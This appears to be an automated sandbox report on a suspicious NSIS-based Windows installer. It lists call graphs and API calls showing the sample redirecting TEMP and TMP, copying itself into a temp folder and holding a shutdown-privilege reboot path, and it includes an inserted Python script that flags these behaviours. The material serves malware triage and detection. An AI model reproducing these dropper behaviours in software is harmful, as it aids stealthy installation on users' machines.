4377->4382 4379 404b26 4379->4365 4380->4373 4381->4375 4382->4379 5256 401ca3 5257 402ba2 18 API calls 5256->5257 5258 401ca9 IsWindow 5257->5258 5259 401a05 5258->5259 5260 402a27 SendMessageW 5261 402a41 InvalidateRect 5260->5261 5262 402a4c 5260->5262 5261->5262 5263 404228 lstrcpynW lstrlenW 4463 40242a 4474 402cc9 4463->4474 4465 402434 4466 402bbf 18 API calls 4465->4466 4467 40243d 4466->4467 4468 402448 RegQueryValueExW 4467->4468 4472 40281e 4467->4472 4469 40246e RegCloseKey 4468->4469 4470 402468 4468->4470 4469->4472 4470->4469 4478 405f97 wsprintfW 4470->4478 4475 402bbf 18 API calls 4474->4475 4476 402ce2 4475->4476 4477 402cf0 RegOpenKeyExW 4476->4477 4477->4465 4478->4469 4479 404b2b GetDlgItem GetDlgItem 4480 404b7d 7 API calls 4479->4480 4488 404d96 4479->4488 4481 404c20 DeleteObject 4480->4481 4482 404c13 SendMessageW 4480->4482 4483 404c29 4481->4483 4482->4481 4484 404c38 4483->4484 4485 404c60 4483->4485 4487 406072 18 API calls 4484->4487 4535 404114 4485->4535 4486 404f26 4493 404f30 SendMessageW 4486->4493 4494 404f38 4486->4494 4495 404c42 SendMessageW SendMessageW 4487->4495 4489 404e5b 4488->4489 4491 404e7a 4488->4491 4496 404df6 4488->4496 4489->4491 4501 404e6c SendMessageW 4489->4501 4491->4486 4492 40510e 4491->4492 4499 404ed3 SendMessageW 4491->4499 4543 40417b 4492->4543 4493->4494 4505 404f51 4494->4505 4506 404f4a ImageList_Destroy 4494->4506 4519 404f61 4494->4519 4495->4483 4502 404a79 5 API calls 4496->4502 4497 404c74 4498 404114 19 API calls 4497->4498 4518 404c82 4498->4518 4499->4492 4503 404ee8 SendMessageW 4499->4503 4501->4491 4516 404e07 4502->4516 4509 404efb 4503->4509 4507 404f5a GlobalFree 4505->4507 4505->4519 4506->4505 4507->4519 4508 404d57 GetWindowLongW SetWindowLongW 4512 404d70 4508->4512 4520 404f0c SendMessageW 4509->4520 4510 4050d0 4510->4492 4511 4050e2 ShowWindow GetDlgItem ShowWindow 4510->4511 4511->4492 4513 404d76 ShowWindow 4512->4513 4514 404d8e 4512->4514 4538 404149 SendMessageW 4513->4538 
4539 404149 SendMessageW 4514->4539 4516->4489 4517 404cd2 SendMessageW 4517->4518 4518->4508 4518->4517 4521 404d51 4518->4521 4523 404d0e SendMessageW 4518->4523 4524 404d1f SendMessageW 4518->4524 4519->4510 4525 404af9 4 API calls 4519->4525 4530 404f9c 4519->4530 4520->4486 4521->4508 4521->4512 4523->4518 4524->4518 4525->4530 4526 404d89 4526->4492 4527 4050a6 InvalidateRect 4527->4510 4528 4050bc 4527->4528 4540 404a34 4528->4540 4529 404fca SendMessageW 4531 404fe0 4529->4531 4530->4529 4530->4531 4531->4527 4533 405041 4531->4533 4534 405054 SendMessageW SendMessageW 4531->4534 4533->4534 4534->4531 4536 406072 18 API calls 4535->4536 4537 40411f SetDlgItemTextW 4536->4537 4537->4497 4538->4526 4539->4488 4557 40496b 4540->4557 4542 404a49 4542->4510 4544 404193 GetWindowLongW 4543->4544 4554 40421c 4543->4554 4545 4041a4 4544->4545 4544->4554 4546 4041b3 GetSysColor 4545->4546 4547 4041b6 4545->4547 4546->4547 4548 4041c6 SetBkMode 4547->4548 4549 4041bc SetTextColor 4547->4549 4550 4041e4 4548->4550 4551 4041de GetSysColor 4548->4551 4549->4548 4552 4041f5 4550->4552 4553 4041eb SetBkColor 4550->4553 4551->4550 4552->4554 4555 404208 DeleteObject 4552->4555 4556 40420f CreateBrushIndirect 4552->4556 4553->4552 4555->4556 4556->4554 4558 404984 4557->4558 4559 406072 18 API calls 4558->4559 4560 4049e8 4559->4560 4561 406072 18 API calls 4560->4561 4562 4049f3 4561->4562 4563 406072 18 API calls 4562->4563 4564 404a09 lstrlenW wsprintfW SetDlgItemTextW 4563->4564 4564->4542 5264 40172d 5265 402bbf 18 API calls 5264->5265 5266 401734 SearchPathW 5265->5266 5267 40174f 5266->5267 5268 4045af 5269 4045db 5268->5269 5270 4045ec 5268->5270 5329 405779 GetDlgItemTextW 5269->5329 5272 4045f8 GetDlgItem 5270->5272 5277 404657 5270->5277 5274 40460c 5272->5274 5273 4045e6 5276 4062e4 5 API calls 5273->5276 5279 404620 SetWindowTextW 5274->5279 5284 405aaf 4 API calls 5274->5284 5275 40473b 5326 4048ea 5275->5326 5331 405779 GetDlgItemTextW 5275->5331 5276->5270 
5277->5275 5281 406072 18 API calls 5277->5281 5277->5326 5282 404114 19 API calls 5279->5282 5280 40476b 5285 405b0c 18 API calls 5280->5285 5286 4046cb SHBrowseForFolderW 5281->5286 5287 40463c 5282->5287 5283 40417b 8 API calls 5288 4048fe 5283->5288 5289 404616 5284->5289 5290 404771 5285->5290 5286->5275 5291 4046e3 CoTaskMemFree 5286->5291 5292 404114 19 API calls 5287->5292 5289->5279 5293 405a04 3 API calls 5289->5293 5332 406050 lstrcpynW 5290->5332 5294 405a04 3 API calls 5291->5294 5295 40464a 5292->5295 5293->5279 5296 4046f0 5294->5296 5330 404149 SendMessageW 5295->5330 5299 404727 SetDlgItemTextW 5296->5299 5304 406072 18 API calls 5296->5304 5299->5275 5300 404650 5302 40642a 5 API calls 5300->5302 5301 404788 5303 40642a 5 API calls 5301->5303 5302->5277 5311 40478f 5303->5311 5305 40470f lstrcmpiW 5304->5305 5305->5299 5308 404720 lstrcatW 5305->5308 5306 4047d0 5333 406050 lstrcpynW 5306->5333 5308->5299 5309 4047d7 5310 405aaf 4 API calls 5309->5310 5312 4047dd GetDiskFreeSpaceW 5310->5312 5311->5306 5314 405a50 2 API calls 5311->5314 5316 404828 5311->5316 5315 404801 MulDiv 5312->5315 5312->5316 5314->5311 5315->5316 5317 404a34 21 API calls 5316->5317 5327 404899 5316->5327 5320 404886 5317->5320 5318 40140b 2 API calls 5319 4048bc 5318->5319 5334 404136 EnableWindow 5319->5334 5322 40489b SetDlgItemTextW 5320->5322 5323 40488b 5320->5323 5322->5327 5325 40496b 21 API calls 5323->5325 5324 4048d8 5324->5326 5335 404544 5324->5335 5325->5327 5326->5283 5327->5318 5327->5319 5329->5273 5330->5300 5331->5280 5332->5301 5333->5309 5334->5324 5336 404552 5335->5336 5337 404557 SendMessageW 5335->5337 5336->5337 5337->5326 5338 4042b1 5339 4042c9 5338->5339 5343 4043e3 5338->5343 5344 404114 19 API calls 5339->5344 5340 40444d 5341 40451f 5340->5341 5342 404457 GetDlgItem 5340->5342 5349 40417b 8 API calls 5341->5349 5345 4044e0 5342->5345 5346 404471 5342->5346 5343->5340 5343->5341 5347 40441e GetDlgItem SendMessageW 5343->5347 5348 404330 
5344->5348 5345->5341 5354 4044f2 5345->5354 5346->5345 5353 404497 6 API calls 5346->5353 5369 404136 EnableWindow 5347->5369 5351 404114 19 API calls 5348->5351 5352 40451a 5349->5352 5356 40433d CheckDlgButton 5351->5356 5353->5345 5357 404508 5354->5357 5358 4044f8 SendMessageW 5354->5358 5355 404448 5360 404544 SendMessageW 5355->5360 5367 404136 EnableWindow 5356->5367 5357->5352 5359 40450e SendMessageW 5357->5359 5358->5357 5359->5352 5360->5340 5362 40435b GetDlgItem 5368 404149 SendMessageW 5362->5368 5364 404371 SendMessageW 5365 404397 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5364->5365 5366 40438e GetSysColor 5364->5366 5365->5352 5366->5365 5367->5362 5368->5364 5369->5355 5370 4027b4 5371 4027ba 5370->5371 5372 4027c2 FindClose 5371->5372 5373 402a4c 5371->5373 5372->5373 4571 401b37 4572 401b44 4571->4572 4573 401b88 4571->4573 4580 401bcd 4572->4580 4581 401b5b 4572->4581 4574 401bb2 GlobalAlloc 4573->4574 4575 401b8d 4573->4575 4577 406072 18 API calls 4574->4577 4586 402288 4575->4586 4592 406050 lstrcpynW 4575->4592 4576 406072 18 API calls 4579 402282 4576->4579 4577->4580 4584 405795 MessageBoxIndirectW 4579->4584 4580->4576 4580->4586 4590 406050 lstrcpynW 4581->4590 4582 401b9f GlobalFree 4582->4586 4584->4586 4585 401b6a 4591 406050 lstrcpynW 4585->4591 4588 401b79 4593 406050 lstrcpynW 4588->4593 4590->4585 4591->4588 4592->4582 4593->4586 5374 402537 5375 402562 5374->5375 5376 40254b 5374->5376 5377 402596 5375->5377 5378 402567 5375->5378 5379 402ba2 18 API calls 5376->5379 5381 402bbf 18 API calls 5377->5381 5380 402bbf 18 API calls 5378->5380 5382 402552 5379->5382 5383 40256e WideCharToMultiByte lstrlenA 5380->5383 5384 40259d lstrlenW 5381->5384 5385 4025e0 5382->5385 5386 4025ca 5382->5386 5388 405d06 5 API calls 5382->5388 5383->5382 5384->5382 5386->5385 5387 405cd7 WriteFile 5386->5387 5387->5385 5388->5386 5389 4014b8 5390 4014be 5389->5390 5391 401389 2 API calls 5390->5391 5392 4014c6 5391->5392 4618 
4015b9 4619 402bbf 18 API calls 4618->4619 4620 4015c0 4619->4620 4621 405aaf 4 API calls 4620->4621 4634 4015c9 4621->4634 4622 401629 4624 40165b 4622->4624 4625 40162e 4622->4625 4623 405a31 CharNextW 4623->4634 4627 401423 25 API calls 4624->4627 4626 401423 25 API calls 4625->4626 4628 401635 4626->4628 4633 401653 4627->4633 4637 406050 lstrcpynW 4628->4637 4629 4056fb 2 API calls 4629->4634 4631 405718 5 API calls 4631->4634 4632 401642 SetCurrentDirectoryW 4632->4633 4634->4622 4634->4623 4634->4629 4634->4631 4635 40160f GetFileAttributesW 4634->4635 4636 40567e 4 API calls 4634->4636 4635->4634 4636->4634 4637->4632 5393 40293b 5394 402ba2 18 API calls 5393->5394 5395 402941 5394->5395 5396 402964 5395->5396 5397 40297d 5395->5397 5405 40281e 5395->5405 5398 40297a 5396->5398 5402 402969 5396->5402 5399 402993 5397->5399 5400 402987 5397->5400 5408 405f97 wsprintfW 5398->5408 5401 406072 18 API calls 5399->5401 5403 402ba2 18 API calls 5400->5403 5401->5405 5407 406050 lstrcpynW 5402->5407 5403->5405 5407->5405 5408->5405 4655 403c3c 4656 403c54 4655->4656 4657 403d8f 4655->4657 4656->4657 4658 403c60 4656->4658 4659 403da0 GetDlgItem GetDlgItem 4657->4659 4664 403de0 4657->4664 4661 403c6b SetWindowPos 4658->4661 4662 403c7e 4658->4662 4663 404114 19 API calls 4659->4663 4660 403e3a 4665 404160 SendMessageW 4660->4665 4674 403d8a 4660->4674 4661->4662 4666 403c83 ShowWindow 4662->4666 4667 403c9b 4662->4667 4668 403dca SetClassLongW 4663->4668 4664->4660 4669 401389 2 API calls 4664->4669 4715 403e4c 4665->4715 4666->4667 4670 403ca3 DestroyWindow 4667->4670 4671 403cbd 4667->4671 4672 40140b 2 API calls 4668->4672 4673 403e12 4669->4673 4675 4040be 4670->4675 4676 403cc2 SetWindowLongW 4671->4676 4677 403cd3 4671->4677 4672->4664 4673->4660 4680 403e16 SendMessageW 4673->4680 4675->4674 4686 4040ce ShowWindow 4675->4686 4676->4674 4678 403d7c 4677->4678 4679 403cdf GetDlgItem 4677->4679 4685 40417b 8 API calls 4678->4685 4683 403cf2 SendMessageW 
IsWindowEnabled 4679->4683 4684 403d0f 4679->4684 4680->4674 4681 40140b 2 API calls 4681->4715 4682 40409f DestroyWindow EndDialog 4682->4675 4683->4674 4683->4684 4688 403d1c 4684->4688 4689 403d63 SendMessageW 4684->4689 4690 403d2f 4684->4690 4699 403d14 4684->4699 4685->4674 4686->4674 4687 406072 18 API calls 4687->4715 4688->4689 4688->4699 4689->4678 4693 403d37 4690->4693 4694 403d4c 4690->4694 4692 403d4a 4692->4678 4697 40140b 2 API calls 4693->4697 4696 40140b 2 API calls 4694->4696 4695 404114 19 API calls 4695->4715 4698 403d53 4696->4698 4697->4699 4698->4678 4698->4699 4729 4040ed 4699->4729 4700 404114 19 API calls 4701 403ec7 GetDlgItem 4700->4701 4702 403ee4 ShowWindow KiUserCallbackDispatcher 4701->4702 4703 403edc 4701->4703 4726 404136 EnableWindow 4702->4726 4703->4702 4705 403f0e EnableWindow 4708 403f22 4705->4708 4706 403f27 GetSystemMenu EnableMenuItem SendMessageW 4707 403f57 SendMessageW 4706->4707 4706->4708 4707->4708 4708->4706 4727 404149 SendMessageW 4708->4727 4728 406050 lstrcpynW 4708->4728 4711 403f85 lstrlenW 4712 406072 18 API calls 4711->4712 4713 403f9b SetWindowTextW 4712->4713 4714 401389 2 API calls 4713->4714 4714->4715 4715->4674 4715->4681 4715->4682 4715->4687 4715->4695 4715->4700 4716 403fdf DestroyWindow 4715->4716 4716->4675 4717 403ff9 CreateDialogParamW 4716->4717 4717->4675 4718 40402c 4717->4718 4719 404114 19 API calls 4718->4719 4720 404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4719->4720 4721 401389 2 API calls 4720->4721 4722 40407d 4721->4722 4722->4674 4723 404085 ShowWindow 4722->4723 4724 404160 SendMessageW 4723->4724 4725 40409d 4724->4725 4725->4675 4726->4705 4727->4708 4728->4711 4730 4040f4 4729->4730 4731 4040fa SendMessageW 4729->4731 4730->4731 4731->4692 5409 10002a7f 5410 10002a97 5409->5410 5411 1000158f 2 API calls 5410->5411 5412 10002ab2 5411->5412

Control-flow Graph
[Graph for the function at 004032A0, the NSIS installer stub's entry routine (blocks 4032a0 through 4037b9; compare the strings "NSIS Error", "~nsu" and ".tmp" in the listing below). Nodes in call-site order: SetErrorMode, GetVersion; lstrlenA; #17 (COMCTL32), OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW; CharNextW; GetTempPathW, with a fallback to GetWindowsDirectoryW + lstrcatW("\Temp") and then a second GetTempPathW + lstrcatW("Low"), followed by SetEnvironmentVariableW for TEMP and TMP; DeleteFileW; OleUninitialize and ExitProcess on the early-exit path; lstrcatW ("~nsu", ".tmp"), lstrcmpiW, SetCurrentDirectoryW, DeleteFileW, CopyFileW and CloseHandle on the self-copy path; GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW (SeShutdownPrivilege), AdjustTokenPrivileges, ExitWindowsEx and ExitProcess on the reboot path. The executed/not-executed colouring and the raw node/edge list are not reproduced here.]
APIs
• SetErrorMode.KERNELBASE ref: 004032C3
• GetVersion.KERNEL32 ref: 004032C9
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
• #17.COMCTL32(00000007,00000009), ref: 00403315
• OleInitialize.OLE32(00000000), ref: 0040331C
• SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
• GetCommandLineW.KERNEL32(Snubbendes Setup,NSIS Error), ref: 0040334D
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00000000), ref: 00403360
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00000020), ref: 00403387
  • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
  • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
• DeleteFileW.KERNELBASE(1033), ref: 00403527
  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Snubbendes Setup,NSIS Error), ref: 0040605D
• OleUninitialize.OLE32(?), ref: 004035F2
• ExitProcess.KERNEL32 ref: 00403613
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403626
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403635
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403640
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00000000,?), ref: 0040364C
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
• DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
• CopyFileW.KERNEL32(C:\Users\user\Desktop\SMGS-RCDU5010031.exe,0042AA08,?), ref: 004036D6
• CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
• OpenProcessToken.ADVAPI32(00000000), ref: 00403739
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
• AdjustTokenPrivileges.ADVAPI32 ref: 00403771
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
• ExitProcess.KERNEL32 ref: 004037B9
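The listing above is the raw call inventory of the NSIS stub's entry routine, and during triage it is easier to reason about once the lines are parsed and ordered by call site. The Python below is an added example, not part of the Joe Sandbox report or of the NSIS project: it parses lines in the report's `• API.MODULE(args), ref: ADDR` form (the sample lines are copied verbatim from the listing above), sorts them by call-site address, and flags the three behaviours a practitioner would note in this function: TEMP/TMP redirection, the sample copying its own image, and the SeShutdownPrivilege/ExitWindowsEx reboot path. The flag names, the `sample_path` parameter and the function names are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Lines copied verbatim from the "APIs" listing of the 0x4032A0 function in
# the report above (none of these are constructed).
REPORT_LINES = r"""
• SetErrorMode.KERNELBASE ref: 004032C3
• GetVersion.KERNEL32 ref: 004032C9
• GetCommandLineW.KERNEL32(Snubbendes Setup,NSIS Error), ref: 0040334D
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00000000), ref: 00403360
  • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
  • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
• CopyFileW.KERNEL32(C:\Users\user\Desktop\SMGS-RCDU5010031.exe,0042AA08,?), ref: 004036D6
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
• AdjustTokenPrivileges.ADVAPI32 ref: 00403771
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
"""

# One report line: optional "Part of subcall function XXXX:" prefix, then
# API.MODULE, an optional "(args)" list, and the call-site address after "ref:".
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                    # call-site address as reported by the sandbox
    subcall_of: Optional[int]   # caller address for "Part of subcall" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report lines and return them ordered by call-site address."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers, blanks and unrecognised lines are skipped
        raw = m.group("args")
        # The report quotes some string arguments; drop the quotes. Splitting
        # on ',' is adequate for this listing (no comma-bearing strings).
        args = [a.strip().strip('"') for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return sorted(calls, key=lambda c: c.ref)


def call_sequence(calls: List[ApiCall]) -> List[str]:
    """API names in call-site order, subcall lines excluded."""
    return [c.api for c in calls if c.subcall_of is None]


def behaviour_flags(calls: List[ApiCall], sample_path: str) -> List[str]:
    """Flag the behaviours worth noting in this stub (flag names are this example's own)."""
    flags = set()
    names = {c.api for c in calls}
    for c in calls:
        # The stub rewrites TEMP/TMP so everything it drops lands in a tree it chose.
        if c.api == "SetEnvironmentVariableW" and c.args and c.args[0].upper() in ("TEMP", "TMP"):
            flags.add(f"redirects_{c.args[0].upper()}")
        # The source of CopyFileW is the running sample itself.
        if c.api == "CopyFileW" and c.args and c.args[0].lower() == sample_path.lower():
            flags.add("copies_self")
    wants_shutdown = any(
        c.api == "LookupPrivilegeValueW" and "SeShutdownPrivilege" in c.args for c in calls
    )
    if wants_shutdown and "AdjustTokenPrivileges" in names and "ExitWindowsEx" in names:
        flags.add("can_force_reboot")
    return sorted(flags)


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module}({', '.join(c.args)})")
    print(behaviour_flags(parsed, r"C:\Users\user\Desktop\SMGS-RCDU5010031.exe"))
```

The `ref` column is the call-site address the sandbox reports, so sorting by it recovers the order of call sites within the function, not the runtime order; the "Part of subcall" lines keep the address of the function they were reported under in `subcall_of`. Arguments are split on commas, which is fine for this listing but would need a quote-aware split for string arguments that contain commas.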
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
• String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes$C:\Users\user\Desktop$C:\Users\user\Desktop\SMGS-RCDU5010031.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Snubbendes Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
• API String ID: 2488574733-54419250
• Opcode ID: 26eb6f9b16d8ac2476929461e4c221b8d9deac311ccc6cd13137edb9e6a9c942
• Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
• Opcode Fuzzy Hash: 26eb6f9b16d8ac2476929461e4c221b8d9deac311ccc6cd13137edb9e6a9c942
• Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
[Graph for the function at 00404B2B (blocks 404b2b through 405120), the installer's tree-view based component-selection page: GetDlgItem for two controls, GlobalAlloc, LoadBitmapW, SetWindowLongW, ImageList_Create and ImageList_AddMasked, a series of SendMessageW calls that populate and style the tree view, DeleteObject, GetWindowLongW/SetWindowLongW, ShowWindow, InvalidateRect, and ImageList_Destroy plus GlobalFree on teardown. The executed/not-executed colouring and the raw node/edge list are not reproduced here.]
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404B43
• GetDlgItem.USER32(?,00000408), ref: 00404B4E
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
• LoadBitmapW.USER32(0000006E), ref: 00404BAB
• SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
• SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
• DeleteObject.GDI32(00000000), ref: 00404C21
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
• GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
• ShowWindow.USER32(?,00000005), ref: 00404D7B
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
• ImageList_Destroy.COMCTL32(?), ref: 00404F4B
• GlobalFree.KERNEL32(?), ref: 00404F5B
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
• SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
• InvalidateRect.USER32(?,00000000,?), ref: 004050AC
• ShowWindow.USER32(?,00000000), ref: 004050FA
• GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                          • Opcode ID: e520d1d30b512afb12423a7735dcee7f53e95ce598d54926476c1ad935aac9f3
                                                                                                                                                                                                          • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e520d1d30b512afb12423a7735dcee7f53e95ce598d54926476c1ad935aac9f3
